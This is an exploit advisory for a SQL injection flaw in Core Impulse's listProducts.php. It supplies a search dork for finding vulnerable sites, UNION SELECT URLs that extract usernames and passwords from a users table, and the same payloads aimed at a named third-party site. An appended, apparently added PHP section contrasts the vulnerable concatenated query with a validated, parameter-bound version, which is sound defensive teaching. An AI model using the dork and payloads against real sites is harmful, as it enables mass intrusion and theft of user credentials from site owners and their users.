Core Impulse suffers from a SQL injection vulnerability.
Core Impulse SQL Injection vulnerability
******************************
Vendor site: www.coreimpulse.com
discovered by: e.wiZz!
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat
Exploit:
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
Example:
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
My blog: infected.blogger.ba
visit: 50centshost.com/forum
Info: this one is lame, but there you go, I feel like a noob :D
Thanks 2: big thanks to my friend aluigi (aluigi.freeforums.org), QKrunix, F34r... I find them somehow interesting, thanks also to skillpak3r for making me laugh with his knowledge :D
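
Added example (not part of the original advisory and not Core Impulse code): a hypothetical reconstruction of how a `cat` parameter like the one in listProducts.php can end up inside the SQL text, next to a hardened handler that validates the value as an integer and binds it. The schema, the function names and the three-column SELECT are assumptions; only the `users` table with its `username` and `password` columns and the payload come from the advisory.

```php
<?php
// Added example: hypothetical reconstruction, not Core Impulse source code.
// Constructed in-memory schema; everything except users.username and
// users.password (named in the advisory) is an assumption.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE products (name TEXT, price INTEGER, cat INTEGER)');
$pdo->exec('CREATE TABLE users (username TEXT, password TEXT)');
$pdo->exec("INSERT INTO products VALUES ('Widget', 10, 1), ('Gadget', 25, 2)");
$pdo->exec("INSERT INTO users VALUES ('admin', 'constructed-hash')");

// Vulnerable pattern: the raw parameter is concatenated into the SQL text,
// so a UNION clause supplied in `cat` becomes part of the statement.
function listProductsVulnerable(PDO $pdo, string $cat): array
{
    $sql = "SELECT name, price, cat FROM products WHERE cat = $cat";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: reject anything that is not a positive integer, then
// bind the value so the driver never parses it as SQL.
function listProductsHardened(PDO $pdo, string $cat): array
{
    $id = filter_var($cat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // a real handler would answer 400 and log the request
    }
    $stmt = $pdo->prepare('SELECT name, price, cat FROM products WHERE cat = :cat');
    $stmt->bindValue(':cat', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The advisory's payload after URL decoding ('+' becomes a space).
$payload = '-9999 UNION ALL SELECT username,2,3 FROM users/*';

// Same payload against both handlers, then a legitimate category id.
var_dump(listProductsVulnerable($pdo, $payload));
var_dump(listProductsHardened($pdo, $payload));
var_dump(listProductsHardened($pdo, '1'));
```

Integer validation alone would stop this payload; the bound parameter is what keeps the query safe if the column later becomes a string.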